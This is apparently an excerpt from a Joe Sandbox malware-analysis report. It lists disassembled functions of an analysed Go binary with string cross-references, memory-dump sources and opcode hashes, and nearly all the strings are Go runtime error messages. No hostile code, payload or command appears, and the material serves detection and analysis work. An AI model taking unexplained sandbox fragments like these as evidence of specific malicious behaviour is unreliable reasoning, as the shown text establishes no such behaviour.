              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase$ flushGen MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nan$@N|$p mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeup$runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64
              • API String ID: 0-3078009593
              • Opcode ID: 8544af5c50c75c10915f9a259bcbae635f23de814e426d6fd1bd20ecffdc917c
              • Instruction ID: ee2d030bfed1b02ff93fc03c4871f5407fe14b0f8acacf1edb1d5f9c8b38db7b
              • Opcode Fuzzy Hash: 8544af5c50c75c10915f9a259bcbae635f23de814e426d6fd1bd20ecffdc917c
              • Instruction Fuzzy Hash: DE0211B4509340CFD710EF28E195B5ABBE4FB89304F51882DE5998B3A6E739E844CF52
              Function 007BF000 Relevance: 6.5, Strings: 5, Instructions: 297COMMON
              Download Yara Rule
              Strings
              • runtime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid , xrefs: 007BF39A
              • casgstatus: waiting for Gwaiting but is Grunnablestrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countinvalid or incomplete multibyte or wide characterinvalid value for environment variable, %s=%s, %vinternal error:, xrefs: 007BF34A
              • newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArme, xrefs: 007BF3C4
              • casgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section in a.out corruptedW. Central A, xrefs: 007BF3F8
              • 1, xrefs: 007BF353
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArme$1$casgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section in a.out corruptedW. Central A$casgstatus: waiting for Gwaiting but is Grunnablestrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countinvalid or incomplete multibyte or wide characterinvalid value for environment variable, %s=%s, %vinternal error:$runtime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid
              • API String ID: 0-10673258
              • Opcode ID: 903e4f46db5fac84b9dd026b2ced0150959e0480de7b935e24b346263e93363f
              • Instruction ID: 9321f79f44e5919d1d26a2fc2212c89fa78ee63692005bc44218877afb852bb8
              • Opcode Fuzzy Hash: 903e4f46db5fac84b9dd026b2ced0150959e0480de7b935e24b346263e93363f
              • Instruction Fuzzy Hash: 12C14774509345CFD314EF28C894BAEBBE1BF88700F50892DE8958B362D739E845DB42
              Function 007D1860 Relevance: 6.4, Strings: 5, Instructions: 194COMMON
              Download Yara Rule
              Strings
              • stackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttribute, xrefs: 007D1AEA
              • stack size not a power of 2too many callback functionstimer when must be positive: unexpected return pc for channel number out of rangecommunication error on sendkey was rejected by servicenot a XENIX named type fileCertEnumCertificatesInStoreEaster Island Sta, xrefs: 007D1AD4
              • !, xrefs: 007D1AF3
              • out of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=, xrefs: 007D19CB
              • out of memory (stackalloc)shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memoryinvalid request descriptorno CSI structure availablerequired key not availableno message of desired typename not unique on networkCertFreeCertificateContext, xrefs: 007D1900
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: !$out of memory (stackalloc)shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memoryinvalid request descriptorno CSI structure availablerequired key not availableno message of desired typename not unique on networkCertFreeCertificateContext$out of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=$stack size not a power of 2too many callback functionstimer when must be positive: unexpected return pc for channel number out of rangecommunication error on sendkey was rejected by servicenot a XENIX named type fileCertEnumCertificatesInStoreEaster Island Sta$stackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttribute
              • API String ID: 0-1460487588
              • Opcode ID: 3801bb8efcd45ed9ab0d9f0de36bdee94cc42612c46c62f8b6e61fd6c2ec219b
              • Instruction ID: 419ae021157aa203ad8a966cd29b12b846e7dab7202f99400f8b5ce5ce10a929
              • Opcode Fuzzy Hash: 3801bb8efcd45ed9ab0d9f0de36bdee94cc42612c46c62f8b6e61fd6c2ec219b
              • Instruction Fuzzy Hash: 27815974609385DFC714EF28C09066ABBF1FBC9300F54882EE8898B356E738E945CB42
              Function 0078D8B0 Relevance: 6.4, Strings: 5, Instructions: 181COMMON
              Download Yara Rule
              Strings
              • persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: incons, xrefs: 0078DB00
              • persistentalloc: align is not a power of 2out of memory allocating checkmarks bitmap/cpu/classes/gc/mark/dedicated:cpu-seconds/memory/classes/metadata/mcache/free:bytes/memory/classes/metadata/mspan/inuse:bytesnon-empty mark queue after concurrent marksweep: t, xrefs: 0078DB16
              • runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinnin, xrefs: 0078DAD8
              • *, xrefs: 0078DB1F
              • persistentalloc: size == 0/gc/cycles/total:gc-cyclesnegative idle mark workersuse of invalid sweepLockerruntime: bad span s.state=freedefer with d.fn != nilforEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent , xrefs: 0078DB2C
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: *$persistentalloc: align is not a power of 2out of memory allocating checkmarks bitmap/cpu/classes/gc/mark/dedicated:cpu-seconds/memory/classes/metadata/mcache/free:bytes/memory/classes/metadata/mspan/inuse:bytesnon-empty mark queue after concurrent marksweep: t$persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: incons$persistentalloc: size == 0/gc/cycles/total:gc-cyclesnegative idle mark workersuse of invalid sweepLockerruntime: bad span s.state=freedefer with d.fn != nilforEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent $runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinnin
              • API String ID: 0-1480168796
              • Opcode ID: a271fc7a9e0fd8ba83bd8c392496457f4950939d1f7ed359cfc25d0cc0e77a86
              • Instruction ID: 1e8dd1ca01dd688e04ad6438ae1a6c827bfaf297b268663470cebbae578a7ebf
              • Opcode Fuzzy Hash: a271fc7a9e0fd8ba83bd8c392496457f4950939d1f7ed359cfc25d0cc0e77a86
              • Instruction Fuzzy Hash: C68105B4649345CFC724EF24D084A6ABBF1FB89304F10886DE8988B355E738ED49CB52
              Function 007A7640 Relevance: 6.4, Strings: 5, Instructions: 155COMMON
              Download Yara Rule
              Strings
              • `W~, xrefs: 007A77B1
              • non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section, xrefs: 007A788A
              • s.sweepgen= allocCount end tracegcProcessPrng, xrefs: 007A782C
              • sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminated, xrefs: 007A7856
              • runtime: bad span s.state=freedefer with d.fn != nilforEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent inittask with no functionscorrupted semaphore ticketout of memory (stackalloc)shrinking stack in libcall, xrefs: 007A77FE
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: s.sweepgen= allocCount end tracegcProcessPrng$ sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminated$`W~$non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section$runtime: bad span s.state=freedefer with d.fn != nilforEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent inittask with no functionscorrupted semaphore ticketout of memory (stackalloc)shrinking stack in libcall
              • API String ID: 0-4165989020
              • Opcode ID: ec2420318d3d6f3c5984a36bcb7ba2560f85f16c9cc23f1a4ed7e54ef97c78cb
              • Instruction ID: b6d3b13388367e6aeea62f73c0f030d94f2be7c86207f399814c8838402b2ce3
              • Opcode Fuzzy Hash: ec2420318d3d6f3c5984a36bcb7ba2560f85f16c9cc23f1a4ed7e54ef97c78cb
              • Instruction Fuzzy Hash: AA61E1B4109345DFC744EF28D494A6ABBE0AF8A704F408A6DF8D987352E738D948DB52
              Function 00794BA0 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
              Download Yara Rule
              Strings
              • refill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memo, xrefs: 00794DEF
              • span has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p stateassembly checks fa, xrefs: 00794DA1
              • out of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=, xrefs: 00794DB7
              • (, xrefs: 00794DF8
              • bad sweepgen in refillspan has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p s, xrefs: 00794DD9
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
